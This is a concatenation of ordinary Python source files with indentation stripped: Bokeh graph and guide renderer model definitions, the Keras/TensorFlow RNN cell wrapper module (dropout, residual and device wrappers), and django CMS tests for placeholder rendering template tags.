y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen
locations when rendering graphs on the plot. If unset, use the
default -range.
""")
layout_provider = Instance(LayoutProvider, help="""
An instance of a LayoutProvider that supplies the layout of the network
graph in cartesian space.
""")
node_renderer = Instance(GlyphRenderer, default=_DEFAULT_NODE_RENDERER, help="""
Instance of a GlyphRenderer containing an XYGlyph that will be rendered
as the graph nodes.
""")
edge_renderer = Instance(GlyphRenderer, default=_DEFAULT_EDGE_RENDERER, help="""
Instance of a GlyphRenderer containing an MultiLine Glyph that will be
rendered as the graph edges.
""")
selection_policy = Instance(GraphHitTestPolicy, default=lambda: NodesOnly(), help="""
An instance of a GraphHitTestPolicy that provides the logic for selection
of graph components.
""")
inspection_policy = Instance(GraphHitTestPolicy, default=lambda: NodesOnly(), help="""
An instance of a GraphHitTestPolicy that provides the logic for inspection
of graph components.
""")
level = Override(default="glyph")
@abstract
class GuideRenderer(Renderer):
''' A base class for all guide renderer types. ``GuideRenderer`` is
not generally useful to instantiate on its own.
'''
plot = Instance(".models.plots.Plot", help="""
The plot to which this guide renderer is attached.
""")
def __init__(self, **kwargs):
super(GuideRenderer, self).__init__(**kwargs)
if self.plot is not None:
if self not in self.plot.renderers:
self.plot.renderers.append(self)
level = Override(default="overlay")
|
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module implementing RNN wrappers."""
# pylint: disable=g-direct-tensorflow-import
# Note that all the APIs under this module are exported as tf.nn.*. This is due
# to the fact that those APIs were from tf.nn.rnn_cell_impl. They are ported
# here to avoid the cyclic dependency issue for serialization. These APIs will
# probably be deprecated and removed in future since similar API is available in
# existing Keras RNN API.
import hashlib
import numbers
import sys
import types as python_types
import warnings
from keras.layers.rnn import lstm
from keras.layers.rnn.abstract_rnn_cell import AbstractRNNCell
from keras.utils import generic_utils
from keras.utils import tf_inspect
import tensorflow.compat.v2 as tf
from tensorflow.python.util.tf_export import tf_export
class _RNNCellWrapper(AbstractRNNCell):
"""Base class for cells wrappers V2 compatibility.
This class along with `rnn_cell_impl._RNNCellWrapperV1` allows to define
wrappers that are compatible with V1 and V2, and defines helper methods for
this purpose.
"""
def __init__(self, cell, *args, **kwargs):
super(_RNNCellWrapper, self).__init__(*args, **kwargs)
self.cell = cell
cell_call_spec = tf_inspect.getfullargspec(cell.call)
self._expects_training_arg = ("training" in cell_call_spec.args) or (
cell_call_spec.varkw is not None
)
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Calls the wrapped cell and performs the wrapping logic.
This method is called from the wrapper's `call` or `__call__` methods.
Args:
inputs: A tensor with wrapped cell's input.
state: A tensor or tuple of tensors with wrapped cell's state.
cell_call_fn: Wrapped cell's method to use for step computation (cell's
`__call__` or 'call' method).
**kwargs: Additional arguments.
Returns:
A pair containing:
- Output: A tensor with cell's output.
- New state: A tensor or tuple of tensors with new wrapped cell's state.
"""
raise NotImplementedError
def call(self, inputs, state, **kwargs):
"""Runs the RNN cell step computation.
When `call` is being used, we assume that the wrapper object has been built,
and therefore the wrapped cells has been built via its `build` method and
its `call` method can be used directly.
This allows to use the wrapped cell and the non-wrapped cell equivalently
when using `call` and `build`.
Args:
inputs: A tensor with wrapped cell's input.
state: A tensor or tuple of tensors with wrapped cell's state.
**kwargs: Additional arguments passed to the wrapped cell's `call`.
Returns:
A pair containing:
- Output: A tensor with cell's output.
- New state: A tensor or tuple of tensors with new wrapped cell's state.
"""
return self._call_wrapped_cell(
inputs, state, cell_call_fn=self.cell.call, **kwargs)
def build(self, inputs_shape):
"""Builds the wrapped cell."""
self.cell.build(inputs_shape)
self.built = True
@property
def wrapped_cell(self):
return self.cell
@property
def state_size(self):
return self.cell.state_size
@property
def output_size(self):
return self.cell.output_size
def zero_state(self, batch_size, dtype):
with tf.name_scope(type(self).__name__ + "ZeroState"):
return self.cell.zero_state(batch_size, dtype)
def get_config(self):
config = {
"cell": {
"class_name": self.cell.__class__.__name__,
"config": self.cell.get_config()
},
}
base_config = super(_RNNCellWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
config = config.copy()
from keras.layers.serialization import deserialize as deserialize_layer # pylint: disable=g-import-not-at-top
cell = deserialize_layer(config.pop("cell"), custom_objects=custom_objects)
return cls(cell, **config)
@tf_export("nn.RNNCellDropoutWrapper", v1=[])
class DropoutWrapper(_RNNCellWrapper):
"""Operator adding dropout to inputs and outputs of the given cell."""
def __init__(self,
cell,
input_keep_prob=1.0,
output_keep_prob=1.0,
state_keep_prob=1.0,
variational_recurrent=False,
input_size=None,
dtype=None,
seed=None,
dropout_state_filter_visitor=None,
**kwargs):
"""Create a cell with added input, state, and/or output dropout.
If `variational_recurrent` is set to `True` (**NOT** the default behavior),
then the same dropout mask is applied at every step, as described in:
[A Theoretically Grounded Application of Dropout in Recurrent
Neural Networks. Y. Gal, Z. Ghahramani](https://arxiv.org/abs/1512.05287).
Otherwise a different dropout mask is applied at every time step.
Note, by default (unless a custom `dropout_state_filter` is provided),
the memory state (`c` component of any `LSTMStateTuple`) passing through
a `DropoutWrapper` is never modified. This behavior is described in the
above article.
Args:
cell: an RNNCell, a projection to output_size is added to it.
input_keep_prob: unit Tensor or float between 0 and 1, input keep
probability; if it is constant and 1, no input dropout will be added.
output_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is constant and 1, no output dropout will be added.
state_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is constant and 1, no output dropout will be added.
State dropout is performed on the outgoing states of the cell. **Note**
the state components to which dropout is applied when `state_keep_prob`
is in `(0, 1)` are also determined by the argument
`dropout_state_filter_visitor` (e.g. by default dropout is never applied
to the `c` component of an `LSTMStateTuple`).
variational_recurrent: Python bool. If `True`, then the same dropout
pattern is applied across all time steps per run call. If this parameter
is set, `input_size` **must** be provided.
input_size: (optional) (possibly nested tuple of) `TensorShape` objects
containing the depth(s) of the input tensors expected to be passed in to
the `DropoutWrapper`. Required and used **iff** `variational_recurrent
= True` and `input_keep_prob < 1`.
dtype: (optional) The `dtype` of the input, state, and output tensors.
Required and used **iff** `variational_recurrent = True`.
seed: (optional) integer, the randomness seed.
dropout_state_filter_visitor: (optional), default: (see below). Function
that takes any hierarchical level of the state and returns a scalar or
depth=1 structure of Python booleans describing which terms in the state
should be dropped out. In addition, if the function returns `True`,
dropout is applied across this sublevel. If the function returns
`False`, dropout is not applied across this entire sublevel.
Default behavior: perform dropout on all terms except the memory (`c`)
state of `LSTMCellState` objects, and don't try to apply dropout to
`TensorArray` objects: ```
def dropout_state_filter_visitor(s):
if isinstance(s, LSTMCellState): # Never perform dropout on the c
state. return LSTMCellState(c=False, h=True)
elif isinstance(s, TensorArray): return False return True ```
**kwargs: dict of keyword arguments for base layer.
Raises:
TypeError: if `cell` is not an `RNNCell`, or `keep_state_fn` is provided
but not `callable`.
ValueError: if any of the keep_probs are not between 0 and 1.
"""
if isinstance(cell, lstm.LSTMCell):
raise ValueError("keras LSTM cell does not work with DropoutWrapper. "
"Please use LSTMCell(dropout=x, recurrent_dropout=y) "
"instead.")
super(DropoutWrapper, self).__init__(cell, dtype=dtype, **kwargs)
if (dropout_state_filter_visitor is not None and
not callable(dropout_state_filter_visitor)):
raise TypeError("dropout_state_filter_visitor must be callable. "
f"Received: {dropout_state_filter_visitor}")
self._dropout_state_filter = (
dropout_state_filter_visitor or _default_dropout_state_filter_visitor)
with tf.name_scope("DropoutWrapperInit"):
def tensor_and_const_value(v):
tensor_value = tf.convert_to_tensor(v)
const_value = tf.get_static_value(tensor_value)
return (tensor_value, const_value)
for prob, attr in [(input_keep_prob, "input_keep_prob"),
(state_keep_prob, "state_keep_prob"),
(output_keep_prob, "output_keep_prob")]:
tensor_prob, const_prob = tensor_and_const_value(prob)
if const_prob is not None:
if const_prob < 0 or const_prob > 1:
raise ValueError(
f"Parameter {attr} must be between 0 and 1. "
"Received {const_prob}")
setattr(self, "_%s" % attr, float(const_prob))
else:
setattr(self, "_%s" % attr, tensor_prob)
# Set variational_recurrent, seed before running the code below
self._variational_recurrent = variational_recurrent
self._input_size = input_size
self._seed = seed
self._recurrent_input_noise = None
self._recurrent_state_noise = None
self._recurrent_output_noise = None
if variational_recurrent:
if dtype is None:
raise ValueError(
"When variational_recurrent=True, dtype must be provided")
def convert_to_batch_shape(s):
# Prepend a 1 for the batch dimension; for recurrent
# variational dropout we use the same dropout mask for all
# batch elements.
return tf.concat(([1], tf.TensorShape(s).as_list()), 0)
def batch_noise(s, inner_seed):
shape = convert_to_batch_shape(s)
return tf.random.uniform(shape, seed=inner_seed, dtype=dtype)
if (not isinstance(self._input_keep_prob, numbers.Real) or
self._input_keep_prob < 1.0):
if input_size is None:
raise ValueError(
"When variational_recurrent=True and input_keep_prob < 1.0 or "
"is unknown, input_size must be provided")
self._recurrent_input_noise = _enumerated_map_structure_up_to(
input_size,
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("input", i)),
input_size)
self._recurrent_state_noise = _enumerated_map_structure_up_to(
cell.state_size,
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("state", i)),
cell.state_size)
self._recurrent_output_noise = _enumerated_map_structure_up_to(
cell.output_size,
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("output", i)),
cell.output_size)
def _gen_seed(self, salt_prefix, index):
if self._seed is None:
return None
salt = "%s_%d" % (salt_prefix, index)
string = (str(self._seed) + salt).encode("utf-8")
return int(hashlib.md5(string).hexdigest()[:8], 16) & 0x7FFFFFFF
def _variational_recurrent_dropout_value(
self, unused_index, value, noise, keep_prob):
"""Performs dropout given the pre-calculated noise tensor."""
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob + noise
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
ret = tf.divide(value, keep_prob) * binary_tensor
ret.set_shape(value.get_shape())
return ret
def _dropout(self,
values,
salt_prefix,
recurrent_noise,
keep_prob,
shallow_filtered_substructure=None):
"""Decides whether to perform standard dropout or recurrent dropout."""
if shallow_filtered_substructure is None:
# Put something so we traverse the entire structure; inside the
# dropout function we check to see if leafs of this are bool or not.
shallow_filtered_substructure = values
if not self._variational_recurrent:
def dropout(i, do_dropout, v):
if not isinstance(do_dropout, bool) or do_dropout:
return tf.nn.dropout(
v, rate=1. - keep_prob, seed=self._gen_seed(salt_prefix, i))
else:
return v
return _enumerated_map_structure_up_to(
shallow_filtered_substructure, dropout,
*[shallow_filtered_substructure, values])
else:
def dropout(i, do_dropout, v, n):
if not isinstance(do_dropout, bool) or do_dropout:
return self._variational_recurrent_dropout_value(i, v, n, keep_prob)
else:
return v
return _enumerated_map_structure_up_to(
shallow_filtered_substructure, dropout,
*[shallow_filtered_substructure, values, recurrent_noise])
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Runs the wrapped cell and applies dropout.
Args:
inputs: A tensor with wrapped cell's input.
state: A tensor or tuple of tensors with wrapped cell's state.
cell_call_fn: Wrapped cell's method to use for step computation (cell's
`__call__` or 'call' method).
**kwargs: Additional arguments.
Returns:
A pair containing:
- Output: A tensor with cell's output.
- New state: A tensor or tuple of tensors with new wrapped cell's state.
"""
def _should_dropout(p):
return (not isinstance(p, float)) or p < 1
if _should_dropout(self._input_keep_prob):
inputs = self._dropout(inputs, "input", self._recurrent_input_noise,
self._input_keep_prob)
output, new_state = cell_call_fn(inputs, state, **kwargs)
if _should_dropout(self._state_keep_prob):
# Identify which subsets of the state to perform dropout on and
# which ones to keep.
shallow_filtered_substructure = tf.__internal__.nest.get_traverse_shallow_structure(
self._dropout_state_filter, new_state)
new_state = self._dropout(new_state, "state", self._recurrent_state_noise,
self._state_keep_prob,
shallow_filtered_substructure)
if _should_dropout(self._output_keep_prob):
output = self._dropout(output, "output", self._recurrent_output_noise,
self._output_keep_prob)
return output, new_state
def get_config(self):
"""Returns the config of the dropout wrapper."""
config = {
"input_keep_prob": self._input_keep_prob,
"output_keep_prob": self._output_keep_prob,
"state_keep_prob": self._state_keep_prob,
"variational_recurrent": self._variational_recurrent,
"input_size": self._input_size,
"seed": self._seed,
}
if self._dropout_state_filter != _default_dropout_state_filter_visitor: # pylint: disable=comparison-with-callable
function, function_type, function_module = _serialize_function_to_config(
self._dropout_state_filter)
config.update({"dropout_fn": function,
"dropout_fn_type": function_type,
"dropout_fn_module": function_module})
base_config = super(DropoutWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
if "dropout_fn" in config:
config = config.copy()
dropout_state_filter = _parse_config_to_function(
config, custom_objects, "dropout_fn", "dropout_fn_type",
"dropout_fn_module")
config.pop("dropout_fn")
config["dropout_state_filter_visitor"] = dropout_state_filter
return super(DropoutWrapper, cls).from_config(
config, custom_objects=custom_objects)
@tf_export("nn.RNNCellResidualWrapper", v1=[])
class ResidualWrapper(_RNNCellWrapper):
"""RNNCell wrapper that ensures cell inputs are added to the outputs."""
def __init__(self, cell, residual_fn=None, **kwargs):
"""Constructs a `ResidualWrapper` for `cell`.
Args:
cell: An instance of `RNNCell`.
residual_fn: (Optional) The function to map raw cell inputs and raw cell
outputs to the actual cell outputs of the residual network.
Defaults to calling nest.map_structure on (lambda i, o: i + o), inputs
and outputs.
**kwargs: dict of keyword arguments for base layer.
"""
super(ResidualWrapper, self).__init__(cell, **kwargs)
self._residual_fn = residual_fn
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Run the cell and then apply the residual_fn on its inputs to its outputs.
Args:
inputs: cell inputs.
state: cell state.
cell_call_fn: Wrapped cell's method to use for step computation (cell's
`__call__` or 'call' method).
**kwargs: Additional arguments passed to the wrapped cell's `call`.
Returns:
Tuple of cell outputs and new state.
Raises:
TypeError: If cell inputs and outputs have different structure (type).
ValueError: If cell inputs and outputs have different structure (value).
"""
outputs, new_state = cell_call_fn(inputs, state, **kwargs)
# Ensure shapes match
def assert_shape_match(inp, out):
inp.get_shape().assert_is_compatible_with(out.get_shape())
def default_residual_fn(inputs, outputs):
tf.nest.assert_same_structure(inputs, outputs)
tf.nest.map_structure(assert_shape_match, inputs, outputs)
return tf.nest.map_structure(lambda inp, out: inp + out, inputs, outputs)
res_outputs = (self._residual_fn or default_residual_fn)(inputs, outputs)
return (res_outputs, new_state)
def get_config(self):
"""Returns the config of the residual wrapper."""
if self._residual_fn is not None:
function, function_type, function_module = _serialize_function_to_config(
self._residual_fn)
config = {
"residual_fn": function,
"residual_fn_type": function_type,
"residual_fn_module": function_module
}
else:
config = {}
base_config = super(ResidualWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
if "residual_fn" in config:
config = config.copy()
residual_function = _parse_config_to_function(config, custom_objects,
"residual_fn",
"residual_fn_type",
"residual_fn_module")
config["residual_fn"] = residual_function
return super(ResidualWrapper, cls).from_config(
config, custom_objects=custom_objects)
@tf_export("nn.RNNCellDeviceWrapper", v1=[])
class DeviceWrapper(_RNNCellWrapper):
"""Operator that ensures an RNNCell runs on a particular device."""
def __init__(self, cell, device, **kwargs):
"""Construct a `DeviceWrapper` for `cell` with device `device`.
Ensures the wrapped `cell` is called with `tf.device(device)`.
Args:
cell: An instance of `RNNCell`.
device: A device string or function, for passing to `tf.device`.
**kwargs: dict of keyword arguments for base layer.
"""
super(DeviceWrapper, self).__init__(cell, **kwargs)
self._device = device
def zero_state(self, batch_size, dtype):
with tf.name_scope(type(self).__name__ + "ZeroState"):
with tf.compat.v1.device(self._device):
return self.cell.zero_state(batch_size, dtype)
def _call_wrapped_cell(self, inputs, state, cell_call_fn, **kwargs):
"""Run the cell on specified device."""
with tf.compat.v1.device(self._device):
return cell_call_fn(inputs, state, **kwargs)
def get_config(self):
config = {"device": self._device}
base_config = super(DeviceWrapper, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def _serialize_function_to_config(function):
"""Serialize the function for get_config()."""
if isinstance(function, python_types.LambdaType):
output = generic_utils.func_dump(function)
output_type = "lambda"
module = function.__module__
elif callable(function):
output = function.__name__
output_type = "function"
module = function.__module__
else:
raise ValueError(
f"Unrecognized function type for input: {type(function)}")
return output, output_type, module
def _parse_config_to_function(config, custom_objects, func_attr_name,
func_type_attr_name, module_attr_name):
"""Reconstruct the function from the config."""
globs = globals()
module = config.pop(module_attr_name, None)
if module in sys.modules:
globs.update(sys.modules[module].__dict__)
elif module is not None:
# Note: we don't know the name of the function if it's a lambda.
warnings.warn(
"{} is not loaded, but a layer uses it. "
"It may cause errors.".format(module),
UserWarning,
stacklevel=2)
if custom_objects:
globs.update(custom_objects)
function_type = config.pop(func_type_attr_name)
if function_type == "function":
# Simple lookup in custom objects
function = generic_utils.deserialize_keras_object(
config[func_attr_name],
custom_objects=custom_objects,
printable_module_name="function in wrapper")
elif function_type == "lambda":
# Unsafe deserialization from bytecode
function = generic_utils.func_load(
config[func_attr_name], globs=globs)
else:
raise TypeError(
f"Unknown function type received: {function_type}. "
"Expected types are ['function', 'lambda']")
return function
def _default_dropout_state_filter_visitor(substate):
return not isinstance(substate, tf.TensorArray)
def _enumerated_map_structure_up_to(shallow_structure, map_fn, *args, **kwargs):
ix = [0]
def enumerated_fn(*inner_args, **inner_kwargs):
r = map_fn(ix[0], *inner_args, **inner_kwargs)
ix[0] += 1
return r
return tf.__internal__.nest.map_structure_up_to(shallow_structure,
enumerated_fn, *args,
**kwargs)
|
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
from django.core.cache import cache
from django.template import Template, RequestContext
from django.test.utils import override_settings
from sekizai.context import SekizaiContext
from cms import plugin_rendering
from cms.api import create_page, add_plugin
from cms.models import Page
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.plugin_rendering import render_plugins, PluginContext, render_placeholder_toolbar
from cms.templatetags.cms_tags import _clean_key, _get_cache_key
from cms.test_utils.project.placeholderapp.models import Example1
from cms.test_utils.testcases import CMSTestCase
from cms.test_utils.util.context_managers import ChangeModel
from cms.test_utils.util.mock import AttributeObject
from cms.views import details
TEMPLATE_NAME = 'tests/rendering/base.html'
def sample_plugin_processor(instance, placeholder, rendered_content, original_context):
original_context_var = original_context['original_context_var']
return '%s|test_plugin_processor_ok|%s|%s|%s' % (
rendered_content,
instance.body,
placeholder.slot,
original_context_var
)
def sample_plugin_context_processor(instance, placeholder, original_context):
content = 'test_plugin_context_processor_ok|' + instance.body + '|' + \
placeholder.slot + '|' + original_context['original_context_var']
return {
'test_plugin_context_processor': content,
}
@override_settings(
CMS_TEMPLATES=[(TEMPLATE_NAME, TEMPLATE_NAME), ('extra_context.html', 'extra_context.html')],
)
class RenderingTestCase(CMSTestCase):
def setUp(self):
super(RenderingTestCase, self).setUp()
self.test_user = self._create_user("test", True, True)
with self.login_user_context(self.test_user):
self.test_data = {
'title': u'RenderingTestCase-title',
'slug': u'renderingtestcase-slug',
'reverse_id': u'renderingtestcase-reverse-id',
'text_main': u'RenderingTestCase-main',
'text_sub': u'RenderingTestCase-sub',
}
self.test_data2 = {
'title': u'RenderingTestCase-title2',
'slug': u'RenderingTestCase-slug2',
'reverse_id': u'renderingtestcase-reverse-id2',
}
self.test_data3 = {
'title': u'RenderingTestCase-title3',
'slug': u'RenderingTestCase-slug3',
'reverse_id': u'renderingtestcase-reverse-id3',
'text_sub': u'RenderingTestCase-sub3',
}
self.test_data4 = {
'title': u'RenderingTestCase-title3',
'no_extra': u'no extra var!',
'placeholderconf': {'extra_context': {'extra_context': {'extra_var': 'found extra var'}}},
'extra': u'found extra var',
}
self.insert_test_content()
def insert_test_content(self):
# Insert a page
p = create_page(self.test_data['title'], TEMPLATE_NAME, 'en',
slug=self.test_data['slug'], created_by=self.test_user,
reverse_id=self.test_data['reverse_id'], published=True)
# Placeholders have been inserted on post_save signal:
self.test_placeholders = {}
for placeholder in p.placeholders.all():
self.test_placeholders[placeholder.slot] = placeholder
# Insert some test Text plugins
add_plugin(self.test_placeholders['main'], 'TextPlugin', 'en',
body=self.test_data['text_main'])
add_plugin(self.test_placeholders['sub'], 'TextPlugin', 'en',
body=self.test_data['text_sub'])
p.publish('en')
# Insert another page that is not the home page
p2 = create_page(self.test_data2['title'], TEMPLATE_NAME, 'en',
parent=p, slug=self.test_data2['slug'], published=True,
reverse_id=self.test_data2['reverse_id'])
p2.publish('en')
# Insert another page that is not the home page
p3 = create_page(self.test_data3['title'], TEMPLATE_NAME, 'en',
slug=self.test_data3['slug'], parent=p2,
reverse_id=self.test_data3['reverse_id'], published=True)
# Placeholders have been inserted on post_save signal:
self.test_placeholders3 = {}
for placeholder in p3.placeholders.all():
self.test_placeholders3[placeholder.slot] = placeholder
# # Insert some test Text plugins
add_plugin(self.test_placeholders3['sub'], 'TextPlugin', 'en',
body=self.test_data3['text_sub'])
p3.publish('en')
# Insert another page that is not the home
p4 = create_page(self.test_data4['title'], 'extra_context.html', 'en', parent=p)
# Placeholders have been inserted on post_save signal:
self.test_placeholders4 = {}
for placeholder in p4.placeholders.all():
self.test_placeholders4[placeholder.slot] = placeholder
# Insert some test plugins
add_plugin(self.test_placeholders4['extra_context'], 'ExtraContextPlugin', 'en')
p4.publish('en')
# Reload test pages
self.test_page = self.reload(p.publisher_public)
self.test_page2 = self.reload(p2.publisher_public)
self.test_page3 = self.reload(p3.publisher_public)
self.test_page4 = self.reload(p4.publisher_public)
def get_context(self, page, context_vars={}):
request = self.get_request(page)
return RequestContext(request, context_vars)
def get_request(self, page, *args, **kwargs):
request = super(RenderingTestCase, self).get_request(*args, **kwargs)
request.current_page = page
return request
def strip_rendered(self, content):
return content.strip().replace(u"\n", u"")
@override_settings(CMS_TEMPLATES=[(TEMPLATE_NAME, '')])
def render(self, template, page, context_vars={}):
c = self.get_context(page, context_vars)
t = Template(template)
r = t.render(c)
return self.strip_rendered(r)
@override_settings(CMS_TEMPLATES=[(TEMPLATE_NAME, '')])
def test_details_view(self):
"""
Tests that the `detail` view is working.
"""
response = details(self.get_request(self.test_page), '')
response.render()
r = self.strip_rendered(response.content.decode('utf8'))
self.assertEqual(r, u'|' + self.test_data['text_main'] + u'|' + self.test_data['text_sub'] + u'|')
@override_settings(
CMS_PLUGIN_PROCESSORS=('cms.tests.rendering.sample_plugin_processor',),
CMS_PLUGIN_CONTEXT_PROCESSORS=('cms.tests.rendering.sample_plugin_context_processor',),
)
def test_processors(self):
"""
Tests that default plugin context processors are working, that plugin processors and plugin context processors
can be defined in settings and are working and that extra plugin context processors can be passed to PluginContext.
"""
def test_passed_plugin_context_processor(instance, placeholder, context):
return {'test_passed_plugin_context_processor': 'test_passed_plugin_context_processor_ok'}
t = u'{% load cms_tags %}' + \
u'{{ plugin.counter }}|{{ plugin.instance.body }}|{{ test_passed_plugin_context_processor }}|{{ test_plugin_context_processor }}'
instance, plugin = CMSPlugin.objects.all()[0].get_plugin_instance()
instance.render_template = Template(t)
context = PluginContext({'original_context_var': 'original_context_var_ok'}, instance,
self.test_placeholders['main'], processors=(test_passed_plugin_context_processor,))
plugin_rendering._standard_processors = {}
c = render_plugins((instance,), context, self.test_placeholders['main'])
r = "".join(c)
self.assertEqual(r, u'1|' + self.test_data[
'text_main'] + '|test_passed_plugin_context_processor_ok|test_plugin_context_processor_ok|' +
self.test_data['text_main'] + '|main|original_context_var_ok|test_plugin_processor_ok|' + self.test_data[
'text_main'] + '|main|original_context_var_ok')
plugin_rendering._standard_processors = {}
def test_placeholder(self):
"""
Tests the {% placeholder %} templatetag.
"""
t = u'{% load cms_tags %}' + \
u'|{% placeholder "main" %}|{% placeholder "empty" %}'
r = self.render(t, self.test_page)
self.assertEqual(r, u'|' + self.test_data['text_main'] + '|')
def test_placeholder_extra_context(self):
t = u'{% load cms_tags %}{% placeholder "extra_context" %}'
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['no_extra'])
cache.clear()
with self.settings(CMS_PLACEHOLDER_CONF=self.test_data4['placeholderconf']):
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['extra'])
def test_placeholder_or(self):
"""
Tests the {% placeholder %} templatetag.
"""
t = u'{% load cms_tags %}' + \
u'|{% placeholder "empty" or %}No content{% endplaceholder %}'
r = self.render(t, self.test_page)
self.assertEqual(r, u'|No content')
def test_render_placeholder_tag(self):
"""
Tests the {% render_placeholder %} templatetag.
"""
render_placeholder_body = "I'm the render placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_placeholder_body)
t = '''{% extends "base.html" %}
{% load cms_tags %}
{% block content %}
<h1>{% render_placeholder ex1.placeholder %}</h1>
<h2>{% render_placeholder ex1.placeholder as tempvar %}</h2>
<h3>{{ tempvar }}</h3>
{% endblock content %}
'''
r = self.render(t, self.test_page, {'ex1': ex1})
self.assertIn(
'<h1>%s</h1>' % render_placeholder_body,
r
)
self.assertIn(
'<h2></h2>',
r
)
self.assertIn(
'<h3>%s</h3>' % render_placeholder_body,
r
)
def test_render_uncached_placeholder_tag(self):
"""
Tests the {% render_uncached_placeholder %} templatetag.
"""
render_uncached_placeholder_body = "I'm the render uncached placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_uncached_placeholder_body)
t = '''{% extends "base.html" %}
{% load cms_tags %}
{% block content %}
<h1>{% render_uncached_placeholder ex1.placeholder %}</h1>
<h2>{% render_uncached_placeholder ex1.placeholder as tempvar %}</h2>
<h3>{{ tempvar }}</h3>
{% endblock content %}
'''
r = self.render(t, self.test_page, {'ex1': ex1})
self.assertIn(
'<h1>%s</h1>' % render_uncached_placeholder_body,
r
)
self.assertIn(
'<h2></h2>',
r
)
self.assertIn(
'<h3>%s</h3>' % render_uncached_placeholder_body,
r
)
def test_render_uncached_placeholder_tag_no_use_cache(self):
"""
Tests that {% render_uncached_placeholder %} does not populate cache.
"""
render_uncached_placeholder_body = "I'm the render uncached placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_uncached_placeholder_body)
template = '{% load cms_tags %}<h1>{% render_uncached_placeholder ex1.placeholder %}</h1>'
cache_key = ex1.placeholder.get_cache_key(u"en")
cache_value_before = cache.get(cache_key)
self.render(template, self.test_page, {'ex1': ex1})
cache_value_after = cache.get(cache_key)
self.assertEqual(cache_value_before, cache_value_after)
self.assertIsNone(cache_value_after)
def test_render_placeholder_tag_use_cache(self):
"""
Tests that {% render_placeholder %} populates cache.
"""
render_placeholder_body = "I'm the render placeholder body"
ex1 = Example1(char_1="char_1", char_2="char_2", char_3="char_3",
char_4="char_4")
ex1.save()
add_plugin(ex1.placeholder, u"TextPlugin", u"en", body=render_placeholder_body)
template = '{% load cms_tags %}<h1>{% render_placeholder ex1.placeholder %}</h1>'
cache_key = ex1.placeholder.get_cache_key(u"en")
cache_value_before = cache.get(cache_key)
self.render(template, self.test_page, {'ex1': ex1})
cache_value_after = cache.get(cache_key)
self.assertNotEqual(cache_value_before, cache_value_after)
self.assertIsNone(cache_value_before)
self.assertIsNotNone(cache_value_after)
def test_show_placeholder(self):
"""
Tests the {% show_placeholder %} templatetag, using lookup by pk/dict/reverse_id and passing a Page object.
"""
t = u'{% load cms_tags %}' + \
u'|{% show_placeholder "main" ' + str(self.test_page.pk) + ' %}' + \
u'|{% show_placeholder "main" test_dict %}' + \
u'|{% show_placeholder "sub" "' + str(self.test_page.reverse_id) + '" %}' + \
u'|{% show_placeholder "sub" test_page %}'
r = self.render(t, self.test_page, {'test_page': self.test_page, 'test_dict': {'pk': self.test_page.pk}})
self.assertEqual(r, (u'|' + self.test_data['text_main']) * 2 + (u'|' + self.test_data['text_sub']) * 2)
def test_show_placeholder_extra_context(self):
t = u'{% load cms_tags %}{% show_uncached_placeholder "extra_context" ' + str(self.test_page4.pk) + ' %}'
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['no_extra'])
cache.clear()
with self.settings(CMS_PLACEHOLDER_CONF=self.test_data4['placeholderconf']):
r = self.render(t, self.test_page4)
self.assertEqual(r, self.test_data4['extra'])
def test_show_uncached_placeholder_by_pk(self):
"""
Tests the {% show_uncached_placeholder %} templatetag, using lookup by pk.
"""
template = u'{%% load cms_tags %%}{%% show_uncached_placeholder "main" %s %%}' % self.test_page.pk
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_data['text_main'])
def test_show_uncached_placeholder_by_lookup_dict(self):
template = u'{% load cms_tags %}{% show_uncached_placeholder "main" test_dict %}'
output = self.render(template, self.test_page, {'test_dict': {'pk': self.test_page.pk}})
self.assertEqual(output, self.test_data['text_main'])
def test_show_uncached_placeholder_by_reverse_id(self):
template = u'{%% load cms_tags %%}{%% show_uncached_placeholder "sub" "%s" %%}' % self.test_page.reverse_id
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_data['text_sub'])
def test_show_uncached_placeholder_by_page(self):
template = u'{% load cms_tags %}{% show_uncached_placeholder "sub" test_page %}'
output = self.render(template, self.test_page, {'test_page': self.test_page})
self.assertEqual(output, self.test_data['text_sub'])
